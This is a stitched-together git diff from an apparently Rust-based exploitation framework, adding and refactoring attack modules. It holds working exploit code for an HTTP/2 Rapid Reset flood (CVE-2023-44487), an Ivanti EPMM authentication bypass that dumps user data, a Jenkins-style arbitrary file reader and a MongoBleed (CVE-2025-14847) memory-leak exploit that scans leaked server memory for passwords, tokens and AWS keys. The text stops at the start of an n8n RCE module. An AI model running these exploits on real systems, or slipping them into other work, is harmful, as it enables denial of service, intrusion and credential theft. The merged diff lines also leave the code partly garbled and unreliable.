fn parse_target(target: &str) -> Result<(String, u16)> {
let target = target.trim();
// Use utils.rs normalize_target for comprehensive validation
let normalized = normalize_target(target)?;
// Handle IPv6 addresses in brackets [::1]:8080
if target.starts_with('[') {
if let Some(bracket_end) = target.find(']') {
let host = target[1..bracket_end].to_string();
let rest = &target[bracket_end + 1..];
// Check if normalized result contains a port
if normalized.starts_with('[') {
// IPv6 format: [::1]:port or [::1]
if let Some(bracket_end) = normalized.find(']') {
let host = normalized[1..bracket_end].to_string();
let rest = &normalized[bracket_end + 1..];
if rest.starts_with(':') {
let port = rest[1..].parse::<u16>()
.context("Invalid port number")?;
.context("Invalid port number in normalized target")?;
return Ok((host, port));
} else if rest.is_empty() {
return Ok((host, 443));
} else {
return Ok((host, 443)); // Default HTTPS port
}
}
return Err(anyhow!("Invalid IPv6 format from normalize_target"));
}
// Handle regular host:port or IPv4:port
if let Some(colon_pos) = target.rfind(':') {
// Check if it's an IPv6 address without brackets
let before_colon = &target[..colon_pos];
if before_colon.contains(':') {
// It's IPv6 without brackets, default port
return Ok((target.to_string(), 443));
}
let host = target[..colon_pos].to_string();
let port = target[colon_pos + 1..].parse::<u16>()
.context("Invalid port number")?;
// IPv4 or hostname format: host:port or host
if let Some(colon_pos) = normalized.rfind(':') {
let host = normalized[..colon_pos].to_string();
let port = normalized[colon_pos + 1..].parse::<u16>()
.context("Invalid port number in normalized target")?;
Ok((host, port))
} else {
Ok((target.to_string(), 443))
Ok((normalized, 443)) // Default HTTPS port
}
}
/// Normalize IPv6 host with brackets for socket address
/// Normalize IPv6 host with brackets for socket address resolution
fn normalize_host_for_socket(host: &str) -> String {
let stripped = host.trim_matches(|c| c == '[' || c == ']');
if stripped.contains(':') && !stripped.starts_with('[') {
@@ -106,14 +107,22 @@ fn normalize_host_for_socket(host: &str) -> String {
}
}
/// Create TLS connector with insecure certificate validation
/// Create TLS connector with empty root store (accepts self-signed certs)
/// NOTE: Empty root store means no CA certs are trusted by default.
/// For security testing, this is acceptable as we're testing the protocol.
fn create_tls_connector() -> TlsConnector {
use std::sync::Arc;
use tokio_rustls::rustls::ClientConfig;
// Create an empty root store - allows connections but cert validation will fail
// for untrusted certs (which is fine for security testing of HTTP/2)
let root_store = tokio_rustls::rustls::RootCertStore::empty();
let config = tokio_rustls::rustls::ClientConfig::builder()
.with_safe_defaults()
let config = ClientConfig::builder()
.with_root_certificates(root_store)
.with_no_client_auth();
TlsConnector::from(std::sync::Arc::new(config))
TlsConnector::from(Arc::new(config))
}
/// Perform baseline test with normal HTTP/2 requests
@@ -138,14 +147,25 @@ async fn baseline_test(
.context("Connection timeout")?
.context("Failed to connect")?;
let scheme = if use_ssl { "https" } else { "http" };
// Format host for URI (add brackets for IPv6)
let uri_host = if host.contains(':') && !host.starts_with('[') {
format!("[{}]", host)
} else {
host.to_string()
};
if use_ssl {
let connector = create_tls_connector();
let server_name = tokio_rustls::rustls::ServerName::try_from(host)
.map_err(|_| anyhow!("Invalid server name: {}", host))?;
let server_name = ServerName::try_from(host)
.map_err(|_| anyhow!("Invalid server name: {}", host))?
.to_owned();
let tls_stream = timeout(Duration::from_secs(10), connector.connect(server_name, stream))
.await
.context("TLS handshake timeout")?
.context("TLS handshake failed")?;
let (mut sender, connection) = Builder::new()
.handshake::<_, bytes::BytesMut>(tls_stream)
.await
@@ -163,7 +183,7 @@ async fn baseline_test(
for i in 0..num_requests {
let request = http::Request::builder()
.uri(format!("https://{}:{}/", host, port))
.uri(format!("{}://{}:{}/", scheme, uri_host, port))
.body(())
.context("Failed to build request")?;
@@ -183,7 +203,7 @@ async fn baseline_test(
}
let duration = start.elapsed();
println!("{}", format!("[+] Baseline Results:").green());
println!("{}", "[+] Baseline Results:".green());
println!(" Total Requests: {}", num_requests);
println!(" Successful: {}", successful);
println!(" Success Rate: {:.2}%", (successful as f64 / num_requests as f64) * 100.0);
@@ -210,7 +230,7 @@ async fn baseline_test(
for i in 0..num_requests {
let request = http::Request::builder()
.uri(format!("http://{}:{}/", host, port))
.uri(format!("{}://{}:{}/", scheme, uri_host, port))
.body(())
.context("Failed to build request")?;
@@ -230,7 +250,7 @@ async fn baseline_test(
}
let duration = start.elapsed();
println!("{}", format!("[+] Baseline Results:").green());
println!("{}", "[+] Baseline Results:".green());
println!(" Total Requests: {}", num_requests);
println!(" Successful: {}", successful);
println!(" Success Rate: {:.2}%", (successful as f64 / num_requests as f64) * 100.0);
@@ -267,14 +287,25 @@ async fn rapid_reset_test(
.context("Connection timeout")?
.context("Failed to connect")?;
let scheme = if use_ssl { "https" } else { "http" };
// Format host for URI (add brackets for IPv6)
let uri_host = if host.contains(':') && !host.starts_with('[') {
format!("[{}]", host)
} else {
host.to_string()
};
if use_ssl {
let connector = create_tls_connector();
let server_name = tokio_rustls::rustls::ServerName::try_from(host)
.map_err(|_| anyhow!("Invalid server name: {}", host))?;
let server_name = ServerName::try_from(host)
.map_err(|_| anyhow!("Invalid server name: {}", host))?
.to_owned();
let tls_stream = timeout(Duration::from_secs(10), connector.connect(server_name, stream))
.await
.context("TLS handshake timeout")?
.context("TLS handshake failed")?;
let (mut sender, connection) = Builder::new()
.handshake::<_, bytes::BytesMut>(tls_stream)
.await
@@ -294,7 +325,7 @@ async fn rapid_reset_test(
println!("{}", "[*] Phase 1: Creating streams rapidly...".yellow());
for i in 0..num_streams {
let request = http::Request::builder()
.uri(format!("https://{}:{}/", host, port))
.uri(format!("{}://{}:{}/", scheme, uri_host, port))
.header("user-agent", "CVE-2023-44487-Tester/1.0")
.body(())
.context("Failed to build request")?;
@@ -322,13 +353,15 @@ async fn rapid_reset_test(
let total_streams = created_streams.len();
let mut reset_count = 0;
let reset_delay = if delay_ms > 0 { delay_ms / 10.max(1) } else { 0 };
for (idx, mut send_stream) in created_streams.into_iter().enumerate() {
// Send RST_STREAM - send_reset returns () (unit type)
// Send RST_STREAM
send_stream.send_reset(Reason::CANCEL);
reset_count += 1;
if delay_ms > 0 && idx < total_streams - 1 {
tokio::time::sleep(Duration::from_millis(delay_ms / 10.max(1))).await;
if reset_delay > 0 && idx < total_streams - 1 {
tokio::time::sleep(Duration::from_millis(reset_delay)).await;
}
}
@@ -345,18 +378,7 @@ async fn rapid_reset_test(
println!("{}", format!("[+] Total Duration: {:.3}s", total_duration.as_secs_f64()).green());
// Phase 3: Analysis
println!("{}", "\n[*] Vulnerability Analysis:".yellow());
if reset_rate > 1000.0 {
println!("{}", "[!] HIGH RISK: Server accepts very high reset rates".red().bold());
println!("{}", " This may indicate vulnerability to CVE-2023-44487".red());
} else if reset_rate > 100.0 {
println!("{}", "[!] MEDIUM RISK: Server accepts moderate reset rates".yellow().bold());
println!("{}", " Further testing may be needed".yellow());
} else {
println!("{}", "[+] LOWER RISK: Server has rate limiting on resets".green());
println!("{}", " This suggests some protection against the vulnerability".green());
}
print_vulnerability_analysis(reset_rate);
// Cleanup
drop(sender);
@@ -381,7 +403,7 @@ async fn rapid_reset_test(
println!("{}", "[*] Phase 1: Creating streams rapidly...".yellow());
for i in 0..num_streams {
let request = http::Request::builder()
.uri(format!("http://{}:{}/", host, port))
.uri(format!("{}://{}:{}/", scheme, uri_host, port))
.header("user-agent", "CVE-2023-44487-Tester/1.0")
.body(())
.context("Failed to build request")?;
@@ -409,13 +431,15 @@ async fn rapid_reset_test(
let total_streams = created_streams.len();
let mut reset_count = 0;
let reset_delay = if delay_ms > 0 { delay_ms / 10.max(1) } else { 0 };
for (idx, mut send_stream) in created_streams.into_iter().enumerate() {
// Send RST_STREAM - send_reset returns () (unit type)
// Send RST_STREAM
send_stream.send_reset(Reason::CANCEL);
reset_count += 1;
if delay_ms > 0 && idx < total_streams - 1 {
tokio::time::sleep(Duration::from_millis(delay_ms / 10.max(1))).await;
if reset_delay > 0 && idx < total_streams - 1 {
tokio::time::sleep(Duration::from_millis(reset_delay)).await;
}
}
@@ -432,18 +456,7 @@ async fn rapid_reset_test(
println!("{}", format!("[+] Total Duration: {:.3}s", total_duration.as_secs_f64()).green());
// Phase 3: Analysis
println!("{}", "\n[*] Vulnerability Analysis:".yellow());
if reset_rate > 1000.0 {
println!("{}", "[!] HIGH RISK: Server accepts very high reset rates".red().bold());
println!("{}", " This may indicate vulnerability to CVE-2023-44487".red());
} else if reset_rate > 100.0 {
println!("{}", "[!] MEDIUM RISK: Server accepts moderate reset rates".yellow().bold());
println!("{}", " Further testing may be needed".yellow());
} else {
println!("{}", "[+] LOWER RISK: Server has rate limiting on resets".green());
println!("{}", " This suggests some protection against the vulnerability".green());
}
print_vulnerability_analysis(reset_rate);
// Cleanup
drop(sender);
@@ -453,77 +466,43 @@ async fn rapid_reset_test(
Ok(())
}
/// Print vulnerability analysis based on reset rate
fn print_vulnerability_analysis(reset_rate: f64) {
println!("{}", "\n[*] Vulnerability Analysis:".yellow());
if reset_rate > 1000.0 {
println!("{}", "[!] HIGH RISK: Server accepts very high reset rates".red().bold());
println!("{}", " This may indicate vulnerability to CVE-2023-44487".red());
} else if reset_rate > 100.0 {
println!("{}", "[!] MEDIUM RISK: Server accepts moderate reset rates".yellow().bold());
println!("{}", " Further testing may be needed".yellow());
} else {
println!("{}", "[+] LOWER RISK: Server has rate limiting on resets".green());
println!("{}", " This suggests some protection against the vulnerability".green());
}
}
/// Main entry point for auto-dispatch system
pub async fn run(target: &str) -> Result<()> {
banner();
// Parse target (could be host:port or just host)
// Parse and validate target using utils.rs normalize_target
let (host, default_port) = parse_target(target)?;
println!("{}", format!("[*] Target: {}:{}", host, default_port).cyan());
// Interactive prompts
let mut port_input = String::new();
print!("{}", format!("Enter target port (default {}): ", default_port).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut port_input)
.await
.context("Failed to read port input")?;
let port: u16 = port_input.trim().parse().unwrap_or(default_port);
let mut ssl_input = String::new();
print!("{}", "Use SSL/TLS? (yes/no, default yes): ".cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut ssl_input)
.await
.context("Failed to read SSL input")?;
let use_ssl = !ssl_input.trim().to_lowercase().starts_with('n');
let mut streams_input = String::new();
print!("{}", "Number of streams for rapid reset test (default 100): ".cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut streams_input)
.await
.context("Failed to read streams input")?;
let num_streams: usize = streams_input.trim().parse().unwrap_or(100);
let mut delay_input = String::new();
print!("{}", "Delay between operations in ms (default 1): ".cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut delay_input)
.await
.context("Failed to read delay input")?;
let delay_ms: u64 = delay_input.trim().parse().unwrap_or(1);
let mut baseline_input = String::new();
print!("{}", "Run baseline test first? (yes/no, default yes): ".cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut baseline_input)
.await
.context("Failed to read baseline input")?;
let run_baseline = !baseline_input.trim().to_lowercase().starts_with('n');
// Interactive prompts using shared utilities
let port = prompt_int_range("Target port", default_port as i64, 1, 65535)? as u16;
let use_ssl = prompt_yes_no("Use SSL/TLS?", true)?;
let num_streams = prompt_int_range("Number of streams for rapid reset test", 100, 1, 10000)? as usize;
let delay_ms = prompt_int_range("Delay between operations (ms)", 1, 0, 1000)? as u64;
let run_baseline = prompt_yes_no("Run baseline test first?", true)?;
println!("\n{}", "=".repeat(60).cyan());
println!("{}", format!("Target: {}:{}", host, port).yellow());
println!("{}", format!("SSL: {}", if use_ssl { "Enabled" } else { "Disabled" }).yellow());
println!("{}", format!("Streams: {}", num_streams).yellow());
println!("{}", format!("Delay: {}ms", delay_ms).yellow());
println!("{}", "=".repeat(60).cyan());
// Legal disclaimer
@@ -532,18 +511,7 @@ pub async fn run(target: &str) -> Result<()> {
println!("Ensure you have permission to test the target system.");
println!("Unauthorized use may be illegal.\n");
let mut confirm = String::new();
print!("{}", "Do you have permission to test this system? (yes/no): ".cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut confirm)
.await
.context("Failed to read confirmation")?;
if !confirm.trim().to_lowercase().starts_with('y') {
if !prompt_yes_no("Do you have permission to test this system?", false)? {
println!("{}", "Exiting. Only use this tool on systems you're authorized to test.".red());
return Ok(());
}
@@ -37,8 +37,8 @@ use regex::Regex;
use reqwest::{Client, StatusCode};
use std::time::Duration;
use tokio::time::sleep;
use tokio::io::{self, AsyncBufReadExt, BufReader};
use url::Url;
use crate::utils::normalize_target;
/// ANSI color codes for terminal output
struct Colors;
@@ -93,35 +93,6 @@ async fn safe_request(
}
}
/// // Normalize and extract usable target URL from IPv6/host formats
async fn normalize_target(raw: &str) -> Result<String> {
let mut input = raw.trim().to_string();
// // Handle IPv6 edge brackets like [[::1]] or [[[::1]]]
while input.starts_with('[') && input.ends_with(']') {
input = input.trim_start_matches('[').trim_end_matches(']').to_string();
}
// // Prepend https:// if missing
if !input.starts_with("http://") && !input.starts_with("https://") {
input = format!("https://{}", input);
}
let mut parsed = Url::parse(&input)?;
// // Prompt for port if not present
if parsed.port_or_known_default().is_none() {
println!("{}No port detected. Please enter a port (e.g. 443):{}", Colors::YELLOW, Colors::RESET);
let mut port_line = String::new();
BufReader::new(io::stdin()).read_line(&mut port_line).await?;
let port = port_line.trim().parse::<u16>()?;
parsed.set_port(Some(port))
.map_err(|_| anyhow::anyhow!("Invalid port: {}", port))?;
}
Ok(parsed[..].to_string())
}
/// // Version info grabber for passive fingerprinting
async fn grab_version_info(target: &str) -> Result<Option<String>> {
let version_url = format!("{}/dana-na/auth/url_admin/welcome.cgi?type=inter", target);
@@ -245,7 +216,7 @@ async fn detailed_check(target: &str) -> Result<Vec<String>> {
/// // Required entry point for RouterSploit-style dispatcher
pub async fn run(target: &str) -> Result<()> {
let normalized = normalize_target(target).await?;
let normalized = normalize_target(target)?;
let result = detailed_check(&normalized).await?;
if !result.is_empty() {
@@ -0,0 +1,119 @@
use anyhow::Result;
use colored::*;
use reqwest::Client;
use std::time::Duration;
use serde_json::Value;
use crate::utils::{prompt_required, normalize_target};
/// Ivanti EPMM Authentication Bypass (CVE-2023-35082 & CVE-2023-35078)
///
/// Targets:
/// - /mifs/asfV3/api/v2/authorized/users (CVE-2023-35082)
/// - /mifs/aad/api/v2/authorized/users (CVE-2023-35078)
///
/// Dumps user information if vulnerable.
pub async fn run(target: &str) -> Result<()> {
print_banner();
let raw_ip = if target.is_empty() {
prompt_required("Target IP")?
} else {
target.to_string()
};
let target_ip = normalize_target(&raw_ip)?;
// Default to HTTPS/443 if no scheme provided
let base_url = if target_ip.contains("://") {
target_ip
} else {
format!("https://{}", target_ip)
};
println!("{} Target: {}", "[*]".blue(), base_url);
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(10))
.build()?;
let paths = vec![
("mifs/asfV3", "CVE-2023-35082"),
("mifs/aad", "CVE-2023-35078"),
];
let mut vulnerable = false;
for (path, cve) in paths {
let url = format!("{}/{}/api/v2/authorized/users?adminDeviceSpaceId=1", base_url, path);
println!("{} Checking {} ({}) ...", "[*]".blue(), path, cve);
match check_endpoint(&client, &url).await {
Ok(Some(json)) => {
println!("{} Vulnerable to {}!", "[+]".green(), cve);
vulnerable = true;
process_data(&json);
},
Ok(None) => {}, // Silent if not vulnerable on this path
Err(e) => {
println!("{} Error checking {}: {}", "[-]".red(), path, e);
}
}
}
if !vulnerable {
println!("{} Target does not appear to be vulnerable to checked CVEs.", "[*]".yellow());
}
Ok(())
}
async fn check_endpoint(client: &Client, url: &str) -> Result<Option<Value>> {
let res = client.get(url)
.header("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36")
.header("Accept", "application/json, text/plain, */*")
.send()
.await?;
if res.status().is_success() {
let text = res.text().await?;
if let Ok(json) = serde_json::from_str::<Value>(&text) {
// Check if it has "results" or "result"
if json.get("results").is_some() || json.get("result").is_some() {
return Ok(Some(json));
}
}
}
Ok(None)
}
fn process_data(data: &Value) {
let results = if let Some(r) = data.get("results") {
r
} else if let Some(r) = data.get("result") {
r
} else {
return;
};
if let Some(arr) = results.as_array() {
println!("{} Dumping first 5 users:", "[+]".green());
for (i, user) in arr.iter().take(5).enumerate() {
let email = user["email"].as_str().unwrap_or("N/A");
let name = user["displayName"].as_str().unwrap_or("N/A");
let ip = user["lastLoginIp"].as_str().unwrap_or("N/A");
// roles is an array of strings
let roles = user["roles"].as_array()
.map(|r| r.iter().map(|s| s.as_str().unwrap_or("")).collect::<Vec<_>>().join(", "))
.unwrap_or_default();
println!(" [{}] Name: {}, Email: {}, IP: {}, Roles: {}", i+1, name, email, ip, roles);
}
}
}
fn print_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ Ivanti EPMM Auth Bypass (CVE-2023-35082/35078) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
+1
View File
@@ -1 +1,2 @@
pub mod ivanti_connect_secure_stack_based_buffer_overflow;
pub mod ivanti_epmm_cve_2023_35082;
@@ -33,7 +33,9 @@ use tokio::time::sleep;
use reqwest::{Client};
use uuid::Uuid;
use regex::Regex;
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
use std::io::{Write, BufRead};
use crate::utils::normalize_target;
const TIMEOUT_SECS: u64 = 4;
@@ -61,9 +63,9 @@ impl ExploitState {
}
async fn listen_and_print(&self) -> Result<()> {
let url = format!("{}?remoting=false", self.url);
let response = self.client
.post(&self.url)
.query(&[("remoting", "false")])
.post(&url)
.header("Side", "download")
.header("Session", &self.identifier)
.send()
@@ -105,9 +107,9 @@ impl ExploitState {
async fn send_file_request(&self, filepath: &str) -> Result<()> {
let payload = get_payload(filepath);
let url = format!("{}?remoting=false", self.url);
self.client
.post(&self.url)
.query(&[("remoting", "false")])
.post(&url)
.header("Side", "upload")
.header("Session", &self.identifier)
.body(payload)
@@ -203,60 +205,6 @@ fn make_path_absolute(filepath: &str) -> Result<String> {
}
}
fn format_target_url(url: &str) -> String {
let url = url.trim_end_matches('/');
format!("{}/cli", url)
}
async fn start_interactive_file_read(state: ExploitState) -> Result<()> {
println!("{}", "Press Ctrl+C to exit".cyan());
let mut stdin_reader = tokio::io::BufReader::new(tokio::io::stdin());
loop {
print!("{}", "File to download:\n> ".green().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut input = String::new();
match stdin_reader.read_line(&mut input).await {
Ok(0) => break,
Ok(_) => {
let filepath = input.trim();
if filepath.is_empty() {
continue;
}
let absolute_path = match make_path_absolute(filepath) {
Ok(path) => path,
Err(e) => {
println!("{}", format!("[-] Invalid file path: {}", e).red());
continue;
}
};
match state.read_file(&absolute_path).await {
Ok(_) => {}
Err(e) => {
if e.to_string().contains("timeout") {
println!("{}", "Payload request timed out.".yellow());
} else {
println!("{}", format!("Error: {}", e).red());
}
}
}
}
Err(e) => {
eprintln!("Error reading input: {}", e);
break;
}
}
}
Ok(())
}
pub async fn run(args: &str) -> Result<()> {
let parts: Vec<&str> = args.split_whitespace().collect();
@@ -264,7 +212,9 @@ pub async fn run(args: &str) -> Result<()> {
bail!("Usage: <url> [filepath]\nExample: http://example.com/ /etc/passwd");
}
let url = format_target_url(parts[0]);
let normalized_base = normalize_target(parts[0])?;
let url = format!("{}/cli", normalized_base.trim_end_matches('/'));
let filepath = parts.get(1).map(|s| s.to_string());
let identifier = Uuid::new_v4().to_string();
@@ -303,3 +253,52 @@ pub async fn run(args: &str) -> Result<()> {
Ok(())
}
async fn start_interactive_file_read(state: ExploitState) -> Result<()> {
println!("{}", "Press Ctrl+C to exit".cyan());
let stdin = std::io::stdin();
let mut stdin_reader = stdin.lock();
loop {
print!("{}", "File to download:\n> ".green().bold());
std::io::stdout()
.flush()
.context("Failed to flush stdout")?;
let mut input = String::new();
match stdin_reader.read_line(&mut input) {
Ok(0) => break,
Ok(_) => {
let filepath = input.trim();
if filepath.is_empty() {
continue;
}
let absolute_path = match make_path_absolute(filepath) {
Ok(path) => path,
Err(e) => {
println!("{}", format!("[-] Invalid file path: {}", e).red());
continue;
}
};
match state.read_file(&absolute_path).await {
Ok(_) => {}
Err(e) => {
if e.to_string().contains("timeout") {
println!("{}", "Payload request timed out.".yellow());
} else {
println!("{}", format!("Error: {}", e).red());
}
}
}
}
Err(e) => {
eprintln!("Error reading input: {}", e);
break;
}
}
}
Ok(())
}
+21
View File
@@ -2,6 +2,7 @@ pub mod generic;
pub mod sample_exploit;
pub mod payloadgens;
pub mod tplink;
pub mod trend_micro;
pub mod ssh;
pub mod spotube;
pub mod ftp;
@@ -14,8 +15,28 @@ pub mod zte;
pub mod ivanti;
pub mod apache_tomcat;
pub mod palo_alto;
pub mod php;
pub mod roundcube;
pub mod ruijie;
pub mod flowise;
pub mod sharepoint;
pub mod http2;
pub mod jenkins;
pub mod mongo;
pub mod nginx;
pub mod react;
pub mod hikvision;
pub mod n8n;
pub mod fortinet;
pub mod exim;
pub mod dos;
pub mod dlink;
pub mod vmware;
pub mod telnet;
pub mod bluetooth;
pub mod tenda;
pub mod reolink;
pub mod qnap;
pub mod netgear;
pub mod ubiquiti;
pub mod zyxel;
+1
View File
@@ -0,0 +1 @@
pub mod mongobleed;
+220
View File
@@ -0,0 +1,220 @@
use anyhow::{Context, Result};
use colored::*;
use std::io::{Read, Write};
use flate2::write::ZlibEncoder;
use flate2::Compression;
use tokio::net::TcpStream;
use tokio::io::{AsyncReadExt, AsyncWriteExt};
use tokio::time::{timeout, Duration};
use regex::bytes::Regex;
use std::fs::File;
/// MongoBleed Exploit (CVE-2025-14847)
///
/// Exploits zlib decompression bug to leak server memory via BSON field names.
/// Based on POC by Joe Desimone (https://github.com/joe-desimone/mongobleed)
/// and Neo23x0 (https://github.com/Neo23x0/mongobleed-detector)
pub async fn run(target: &str) -> Result<()> {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ MongoBleed (CVE-2025-14847) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
println!("{}", format!("[*] Target: {}", target).yellow());
// Normalize target using shared utility
let normalized = crate::utils::normalize_target(target)?;
let target_addr = if normalized.contains(':') {
normalized
} else {
format!("{}:27017", normalized)
};
let min_offset = 20;
let max_offset = 8192;
println!("{}", format!("[*] Scanning offsets {}-{}...", min_offset, max_offset).cyan());
let mut all_leaked = Vec::new();
let mut unique_leaks = std::collections::HashSet::new();
// Loop through offsets to try and trigger a leak
for doc_len in min_offset..max_offset {
// Python: response = send_probe(args.host, args.port, doc_len, doc_len + 500)
match send_probe(&target_addr, doc_len, doc_len + 500).await {
Ok(leaks) => {
for data in leaks {
if !unique_leaks.contains(&data) {
unique_leaks.insert(data.clone());
all_leaked.extend_from_slice(&data);
// Show interesting leaks (> 10 bytes) - matches Python logic
if data.len() > 10 {
let preview = String::from_utf8_lossy(&data).replace('\n', "\\n");
let preview_trunk: String = preview.chars().take(80).collect();
println!("[+] offset={:4} len={:4}: {}", doc_len, data.len(), preview_trunk.magenta());
}
}
}
}
Err(_) => {
// Connection errors are common during exploitation attempts, ignore and continue
}
}
}
// Save results
// Python saves to 'leaked.bin'
let output_file = "leaked_mongo_data.bin";
let mut f = File::create(output_file).context("Failed to create output file")?;
f.write_all(&all_leaked)?;
println!();
println!("{}", format!("[*] Total leaked: {} bytes", all_leaked.len()).yellow());
println!("{}", format!("[*] Unique fragments: {}", unique_leaks.len()).yellow());
println!("{}", format!("[*] Saved to: {}", output_file).green());
// Show any secrets found
// Python patterns: ['password', 'secret', 'key', 'token', 'admin', 'AKIA']
let secrets = vec![
"password", "secret", "key", "token", "admin", "AKIA"
];
// Convert all leaked to string (lossy) for searching
let all_leaked_str = String::from_utf8_lossy(&all_leaked).to_lowercase();
for s in secrets {
if all_leaked_str.contains(s) {
println!("{}", format!("[!] Found pattern: {}", s).red().bold());
}
}
Ok(())
}
async fn send_probe(addr: &str, doc_len: u32, buffer_size: u32) -> Result<Vec<Vec<u8>>> {
// 1. Construct the malicious BSON payload
// Python: bson = struct.pack('<i', doc_len) + content
// content = b'\x10a\x00\x01\x00\x00\x00' # int32 a=1
let content = b"\x10a\x00\x01\x00\x00\x00";
let mut bson = Vec::new();
bson.extend_from_slice(&doc_len.to_le_bytes()); // inflated doc_len
bson.extend_from_slice(content);
// 2. Wrap in OP_MSG (Code 2013)
// Python: op_msg = struct.pack('<I', 0) + b'\x00' + bson
let mut op_msg = Vec::new();
op_msg.extend_from_slice(&0u32.to_le_bytes()); // flagBits
op_msg.push(0x00); // sectionKind
op_msg.extend_from_slice(&bson);
// 3. Compress using zlib
let mut encoder = ZlibEncoder::new(Vec::new(), Compression::default());
encoder.write_all(&op_msg)?;
let compressed = encoder.finish()?;
// 4. Create OP_COMPRESSED (Code 2012) payload
// use code 2013 internally
let mut payload = Vec::new();
payload.extend_from_slice(&2013u32.to_le_bytes()); // originalOpcode
payload.extend_from_slice(&buffer_size.to_le_bytes()); // uncompressedSize
payload.push(2); // zlib ID
payload.extend_from_slice(&compressed);
// 5. Create Header
// header = struct.pack('<IIII', 16 + len(payload), 1, 0, 2012)
let msg_length = 16 + payload.len() as u32;
let mut header = Vec::new();
header.extend_from_slice(&msg_length.to_le_bytes());
header.extend_from_slice(&1u32.to_le_bytes()); // requestID
header.extend_from_slice(&0u32.to_le_bytes()); // responseTo
header.extend_from_slice(&2012u32.to_le_bytes()); // opCode (OP_COMPRESSED)
// Send data
let mut stream = timeout(Duration::from_secs(2), TcpStream::connect(addr))
.await
.context("Connection timed out")??;
stream.write_all(&header).await?;
stream.write_all(&payload).await?;
// Read response
let mut response = Vec::new();
let mut buf = [0u8; 4096];
// Read loop with timeout
let read_result = timeout(Duration::from_secs(2), async {
// First read length (4 bytes)
let n = stream.read(&mut buf).await?;
if n == 0 { return Ok(()); }
response.extend_from_slice(&buf[..n]);
// If we got enough for header, check length and read remainder
while response.len() < 4 || (response.len() >= 4 && response.len() < u32::from_le_bytes(response[0..4].try_into().unwrap_or([0,0,0,0])) as usize) {
let n = stream.read(&mut buf).await?;
if n == 0 { break; }
response.extend_from_slice(&buf[..n]);
}
Ok::<(), anyhow::Error>(())
}).await;
// Ignore read errors (timeout etc), proceed to check what we got
let _ = read_result;
extract_leaks(&response)
}
fn extract_leaks(response: &[u8]) -> Result<Vec<Vec<u8>>> {
if response.len() < 25 {
return Ok(vec![]);
}
let opcode = u32::from_le_bytes(response[12..16].try_into().unwrap_or([0,0,0,0]));
// Python logic: check if opcode 2012 (compressed)
// Decompress if so.
let raw_data = if opcode == 2012 {
if response.len() > 25 {
let mut d = flate2::read::ZlibDecoder::new(&response[25..]);
let mut buffer = Vec::new();
if d.read_to_end(&mut buffer).is_ok() {
buffer
} else {
return Ok(vec![]);
}
} else {
return Ok(vec![]);
}
} else {
if response.len() > 16 {
response[16..].to_vec()
} else {
return Ok(vec![]);
}
};
let mut leaks = Vec::new();
// Search for "field name '...'" error pattern
let re_field = Regex::new(r"field name '([^']*)'")?;
for cap in re_field.captures_iter(&raw_data) {
if let Some(m) = cap.get(1) {
let data = m.as_bytes().to_vec();
// Filter some common boring strings
if data != b"?" && data != b"a" && data != b"$db" && data != b"ping" {
leaks.push(data);
}
}
}
// Search for "type (\d+)" pattern
let re_type = Regex::new(r"type (\d+)")?;
for cap in re_type.captures_iter(&raw_data) {
if let Some(m) = cap.get(1) {
if let Ok(s) = std::str::from_utf8(m.as_bytes()) {
if let Ok(val) = s.parse::<u8>() {
leaks.push(vec![val]);
}
}
}
}
Ok(leaks)
}
+1
View File
@@ -0,0 +1 @@
pub mod n8n_rce_cve_2025_68613;
@@ -0,0 +1,614 @@
use anyhow::{anyhow, Context, Result};
use colored::*;
use reqwest::Client;
use serde::Deserialize;
use serde_json::{json, Value};
use std::time::Duration;
use crate::utils::{normalize_target, prompt_input};
const DEFAULT_TIMEOUT_SECS: u64 = 15;
/// Display module banner
fn display_banner() {
println!(
"{}",
"╔═══════════════════════════════════════════════════════════╗".cyan()
);
println!(
"{}",
"║ n8n Expression Injection RCE - CVE-2025-68613 ║".cyan()
);
println!(
"{}",
"║ CVSS: 10.0 (Critical) ║".cyan()
);
println!(
"{}",
"║ Affected: 0.211.0 - 1.120.3, 1.121.0 ║".cyan()
);
println!(
"{}",
"║ PoC by The StingR - Ported to Rust for rustsploit ║".cyan()
);
println!(
"{}",
"╚═══════════════════════════════════════════════════════════╝".cyan()
);
}
// Local normalize_target removed
/// Login response structure
#[derive(Debug, Deserialize)]
struct LoginResponse {
data: Option<LoginData>,
#[serde(rename = "apiKey")]
api_key: Option<String>,
}
#[derive(Debug, Deserialize)]
struct LoginData {
#[serde(rename = "apiKey")]
api_key: Option<String>,
}
/// Workflow creation response
#[derive(Debug, Deserialize)]
struct WorkflowResponse {
id: Option<String>,
data: Option<WorkflowData>,
}
#[derive(Debug, Deserialize)]
struct WorkflowData {
id: Option<String>,
}
/// n8n Exploit Client
struct N8nClient {
client: Client,
base_url: String,
token: Option<String>,
}
impl N8nClient {
fn new(base_url: &str) -> Result<Self> {
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
.cookie_store(true)
.build()
.context("Failed to build HTTP client")?;
Ok(Self {
client,
base_url: normalize_target(base_url)?,
token: None,
})
}
